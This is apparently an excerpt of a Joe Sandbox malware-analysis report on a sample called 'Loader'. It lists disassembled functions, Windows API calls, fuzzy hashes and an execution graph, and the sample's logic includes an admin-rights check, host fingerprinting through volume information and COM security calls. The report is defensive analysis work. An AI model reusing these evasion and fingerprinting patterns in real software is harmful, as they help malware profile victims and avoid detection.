                                                                                                                      • Opcode Fuzzy Hash: e89c1bdbeb840ffa8339428395cfdedb46b2bd143029c754627bef18ddbcca0e
                                                                                                                      • Instruction Fuzzy Hash: C701DB35540615FFDB129F44CC05BEEB7B8FF04710F000629F821E26D0DB749940CA90
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 00194CCD
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00194CD8
                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00194D46
                                                                                                                        • Part of subcall function 00194E29: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00194E41
                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00194CF3
                                                                                                                      • _Yarn.LIBCPMT ref: 00194D09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1088826258-0
                                                                                                                      • Opcode ID: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
                                                                                                                      • Instruction ID: 86bc1d4191b287f2aab416022db7e2ae8be18dafdda312e61c29a7afb9323141
                                                                                                                      • Opcode Fuzzy Hash: ae035912c6d8a5177192b70a617e71caac863f87bc68d2044ce5b6e0a872136c
                                                                                                                      • Instruction Fuzzy Hash: 5D018475A001109BCB06EB60D8559BD7BB5FFA4750B154008E82157391CF34AF42CFC1
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx), ref: 0019AF8F
                                                                                                                      • GetLastError.KERNEL32(?,0019AF33,00000000,?,002150DC,?,?,?,0019B0D6,00000004,InitializeCriticalSectionEx,001B4C70,InitializeCriticalSectionEx,00000000,?,0019AE8D), ref: 0019AF99
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0019AFC1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                      • Opcode ID: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
                                                                                                                      • Instruction ID: a773ee99e4314565ffbcdd94c29eb0dd7a0edf54f67d3193cd12de07fedd8f06
                                                                                                                      • Opcode Fuzzy Hash: 4e6a6b6cc29792df9b42e5011b3cf9ea616deef17f5a47442787e256dda6a2a3
                                                                                                                      • Instruction Fuzzy Hash: D7E08670684204BBEF112F72EC0AB5C3F64AF11B44F504121F90CE84E1D771DAB489C5
                                                                                                                      APIs
                                                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,016E13CA), ref: 001A57C1
                                                                                                                        • Part of subcall function 001A9815: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001A88DA,?,00000000,-00000008), ref: 001A98C1
                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A5A1C
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A5A64
                                                                                                                      • GetLastError.KERNEL32 ref: 001A5B07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2112829910-0
                                                                                                                      • Opcode ID: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
                                                                                                                      • Instruction ID: a7195510aadb6e310c4899b6f250431b5dcb297bc215c708923e0b048c8e866c
                                                                                                                      • Opcode Fuzzy Hash: 40a0872cc8a7ac2f992eae17a792d0d2eea550d39e55a1aa73910b2466ce67e8
                                                                                                                      • Instruction Fuzzy Hash: 35D16979E046589FCB05CFA8D880AEDBBB6FF4A314F18456AE816EB351D730A941CB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustPointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1740715915-0
                                                                                                                      • Opcode ID: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
                                                                                                                      • Instruction ID: 8163d3b21089687138d5515136ccc84ff93c8643e92a85db83e13d9e20d1854e
                                                                                                                      • Opcode Fuzzy Hash: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
                                                                                                                      • Instruction Fuzzy Hash: FA511572604206AFEF289F18C841BBAB7A4FF54710F58452DF905972A1E732EC98C7D2
                                                                                                                      APIs
                                                                                                                      • WriteConso.KERNEL32(00000000,00000000,?,00000000,00000000,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000), ref: 001B055D
                                                                                                                      • GetLastError.KERNEL32(?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA,016E13CA,?,001A60E2,00000000), ref: 001B0569
                                                                                                                        • Part of subcall function 001B052F: CloseHandle.KERNEL32(FFFFFFFE,001B0579,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 001B053F
                                                                                                                      • ___initconout.LIBCMT ref: 001B0579
                                                                                                                        • Part of subcall function 001B04F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B0520,001AEF66,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA), ref: 001B0504
                                                                                                                      • WriteConso.KERNEL32(00000000,00000000,?,00000000,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA), ref: 001B058E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1327366883-0
                                                                                                                      • Opcode ID: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
                                                                                                                      • Instruction ID: e7dbcb7e6e1254848865f1ad5f568a65cb6a3c189e55c9a98c59b4ad5f245973
                                                                                                                      • Opcode Fuzzy Hash: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
                                                                                                                      • Instruction Fuzzy Hash: D3F0AC76500119BBCF232FA5EC089DA3F6AFF0D3A1B044610FA1996930C7328970DF90
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3_catch_strlen
                                                                                                                      • String ID: input string:
                                                                                                                      • API String ID: 3133806014-2984214493
                                                                                                                      • Opcode ID: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
                                                                                                                      • Instruction ID: 95747a5005a0d0288be9de1bb0249a4538e63c065633a2ac9f58d3308fca5cc0
                                                                                                                      • Opcode Fuzzy Hash: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
                                                                                                                      • Instruction Fuzzy Hash: 88411670A44215AFCF20EF58D8D4DAC77F1BF58728F2A8259E429AB2E1C7709C41CB94
                                                                                                                      APIs
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00199C7F
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00199D33
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                      • Opcode ID: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
                                                                                                                      • Instruction ID: 5ff0679b84b7712cce948c77d201eaa845fe1190656a0ee32eb025c30326cf5d
                                                                                                                      • Opcode Fuzzy Hash: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
                                                                                                                      • Instruction Fuzzy Hash: 21418134A00218AFCF14DFACC884A9EBBF5BF45314F148159E8199B392D731AE55CB91
                                                                                                                      APIs
                                                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0019A572
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EncodePointer
                                                                                                                      • String ID: MOC$RCC
                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                      • Opcode ID: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
                                                                                                                      • Instruction ID: 9bc3eb1ec6530c8dda50b9ee1cb7f3dd79aae598a6f2199f190a95a60c6d68aa
                                                                                                                      • Opcode Fuzzy Hash: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
                                                                                                                      • Instruction Fuzzy Hash: A3419971A00209AFCF15DF98CC81AEEBBB5FF48300F598099F904A7221D3359A50CF92
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00197213
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 001972FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: xM!
                                                                                                                      • API String ID: 3761405300-2887631340
                                                                                                                      • Opcode ID: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
                                                                                                                      • Instruction ID: 3dc9bd8c48975e12e356b62edee3a0191d65846b81f5899807626978f3b8ebbf
                                                                                                                      • Opcode Fuzzy Hash: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
                                                                                                                      • Instruction Fuzzy Hash: F621C2B56102019AEB04EF65F94AB903BF8BB68715F11852AE50D8B3A1EBF19980CF45
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0019731B
                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 001973D8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                      • String ID: xM!
                                                                                                                      • API String ID: 3761405300-2887631340
                                                                                                                      • Opcode ID: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
                                                                                                                      • Instruction ID: 781bc52f1a01f93856132eea2e42ac58a78b54b1f0192295adc12ebd4a25c895
                                                                                                                      • Opcode Fuzzy Hash: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
                                                                                                                      • Instruction Fuzzy Hash: EF11A2B9511205DBDB00EF65F949AC03BB9BB68711F11D02AE90C8B3B1EBB09941DF85
                                                                                                                      APIs
                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0019160C
                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00191644
                                                                                                                        • Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194DE3
                                                                                                                        • Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194E07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                      • String ID: bad locale name
                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                      • Opcode ID: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
                                                                                                                      • Instruction ID: d429224d767559da2c1457a5d8503cc03e3c1e9314cf89d1bbd2c5c8e094664d
                                                                                                                      • Opcode Fuzzy Hash: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
                                                                                                                      • Instruction Fuzzy Hash: 90F030B1505B409E83359FBA8491447FBE4BE28310394CE2FE1DEC3A11D730E504CB6A
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00215520), ref: 001A3A4E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: U!$pU!
                                                                                                                      • API String ID: 3664257935-37195876
                                                                                                                      • Opcode ID: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
                                                                                                                      • Instruction ID: 22101bdb92af8cee49fd8270dbffc0d4ad85ca31185bc87b003f0f11b39c4253
                                                                                                                      • Opcode Fuzzy Hash: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
                                                                                                                      • Instruction Fuzzy Hash: E5E04F3AC10564AADB301A18D404390B6D55B51335F55116AF4FD921E0A3711EE58680

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:12%
                                                                                                                      Total number of Nodes:83
                                                                                                                      Total number of Limit Nodes:12
                                                                                                                      execution_graph 19185 411281 CoInitializeSecurity 19240 40ce60 19241 40ce69 19240->19241 19242 40ce71 IsUserAnAdmin 19241->19242 19243 40cfdb ExitProcess 19241->19243 19244 40ce7c 19242->19244 19245 40ce84 GetInputState 19244->19245 19246 40cfd6 19244->19246 19247 40ceb0 19245->19247 19255 442fd0 19246->19255 19247->19247 19249 40cec4 GetCurrentThreadId GetCurrentProcessId 19247->19249 19250 40cef0 19249->19250 19250->19246 19254 411260 CoInitialize 19250->19254 19258 4441f0 19255->19258 19257 442fd5 FreeLibrary 19257->19243 19259 4441f9 19258->19259 19259->19257 19260 4438e4 19261 443900 19260->19261 19261->19261 19262 44395e 19261->19262 19264 443090 LdrInitializeThunk 19261->19264 19264->19262 19186 4433c6 19188 443410 19186->19188 19187 44358e 19188->19187 19190 443090 LdrInitializeThunk 19188->19190 19190->19187 19265 4112a3 19266 4112ad 19265->19266 19267 4116c0 GetSystemDirectoryW 19266->19267 19268 4116b0 CoUninitialize 19266->19268 19269 411743 19266->19269 19271 440350 19266->19271 19267->19266 19272 440366 19271->19272 19273 4403d1 19271->19273 19274 4403c2 RtlFreeHeap 19271->19274 19272->19274 19273->19266 19274->19273 19275 43c821 CoSetProxyBlanket 19191 43a007 19192 43a00c 19191->19192 19195 446610 19192->19195 19196 446640 19195->19196 19199 44667e 19196->19199 19201 443090 LdrInitializeThunk 19196->19201 19197 43a046 19199->19197 19202 443090 LdrInitializeThunk 19199->19202 19201->19199 19202->19197 19203 43ccc5 19204 43cce0 19203->19204 19204->19204 19205 43cd2b SysAllocString 19204->19205 19206 43cdb0 19205->19206 19206->19206 19207 43ce10 SysAllocString 19206->19207 19208 43ce35 19207->19208 19208->19208 19286 4432af 19287 4432b8 GetForegroundWindow 19286->19287 19288 4432cc 19287->19288 19289 4439b5 19290 4439d0 19289->19290 19293 443090 LdrInitializeThunk 19290->19293 19292 443a98 19293->19292 19294 4402f7 19295 440310 19294->19295 19295->19295 19296 440334 RtlAllocateHeap 19295->19296 19209 43cc17 19210 43c973 SysStringLen 19209->19210 19211 43cae0 19209->19211 19212 43c890 VariantInit 19209->19212 19213 43cc27 SysFreeString SysFreeString 19209->19213 19214 43cb55 VariantClear 19209->19214 19215 43c84f 19209->19215 19221 43cb66 19209->19221 19218 43c99d 19210->19218 19211->19214 19216 43c900 19212->19216 19217 43cc47 SysFreeString 19213->19217 19214->19221 19215->19210 19215->19211 19215->19212 19215->19214 19215->19221 19216->19210 19216->19211 19216->19214 19216->19216 19217->19221 19219 43cc70 GetVolumeInformationW 19220 43cc9c 19219->19220 19219->19221 19221->19213 19221->19219 19221->19220 19227 43c754 19228 43c752 19227->19228 19229 43c700 CoCreateInstance 19227->19229 19230 43c6ca CoCreateInstance 19227->19230 19228->19227 19229->19228 19230->19229 19231 43aa9a 19234 43aaca 19231->19234 19232 43ab43 19234->19232 19235 443090 LdrInitializeThunk 19234->19235 19235->19234 19236 43c75e 19237 43c7a0 19236->19237 19237->19237 19238 43c7e9 SysAllocString 19237->19238 19239 43c812 19238->19239

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 4 43cc17-43cc20 5 43c973-43c9a1 SysStringLen 4->5 6 43cae2-43caea 4->6 7 43caf1-43cb32 4->7 8 43c890-43c8f4 VariantInit 4->8 9 43cae0 4->9 10 43cc27-43cc95 SysFreeString * 3 call 4457f0 GetVolumeInformationW 4->10 11 43cb66-43cb70 4->11 12 43cb55-43cb62 VariantClear 4->12 13 43cb39-43cb3a 4->13 14 43c84f-43c86b 4->14 15 43cb3c 4->15 18 43c9b1-43c9d3 5->18 6->7 6->13 6->15 7->13 7->15 17 43c900-43c937 8->17 9->6 30 43cb80-43cb89 10->30 31 43cb90-43cb9c 10->31 32 43cba6-43cbca call 4352d0 10->32 33 43cca4-43ccb6 10->33 34 43cc9c-43cca3 10->34 11->10 12->11 13->9 21 43c86f-43c889 14->21 15->12 17->17 22 43c939-43c952 17->22 25 43c9a3-43c9af 18->25 26 43c9d5-43c9d7 18->26 21->5 21->6 21->7 21->8 21->9 21->11 21->12 21->13 21->15 24 43c956-43c96c 22->24 24->5 24->6 24->7 24->9 24->12 24->13 24->15 25->18 26->25 30->31 30->32 31->32 35 43cba3 31->35 36 43cbf0-43cbfd 31->36 37 43cc04-43cc10 31->37 40 43cbd0-43cbd8 32->40 33->30 33->31 33->32 33->34 35->32 36->36 36->37 37->10 37->30 37->31 37->32 37->34 40->40 41 43cbda-43cbe4 40->41 41->36 41->37
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0043C898
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 0043C97A
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0043CB56
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC31
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC37
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043CC48
                                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Free$Variant$ClearInformationInitVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 171077572-0
                                                                                                                      • Opcode ID: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                      • Instruction ID: f391356ba1e6a8e6107e64313ae411c35e8f889d22a0f8dca9c0fab8c944a7a2
                                                                                                                      • Opcode Fuzzy Hash: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                      • Instruction Fuzzy Hash: FD91DC7A208300DFD714CF24D895B6AB7E6FFC9311F19882DE585972A0EB78E905CB06

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                      • String ID: SPQV
                                                                                                                      • API String ID: 2882748383-3051931956
                                                                                                                      • Opcode ID: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                      • Instruction ID: b95e72557b87e2371c7c31153d7f42c66cf6c520f11fa7e329d023154aa7c17a
                                                                                                                      • Opcode Fuzzy Hash: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                      • Instruction Fuzzy Hash: B731C0205483418BE7006B39945936BABE2DF82314F149E7EE8C1E73D2CA7C884A875B

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
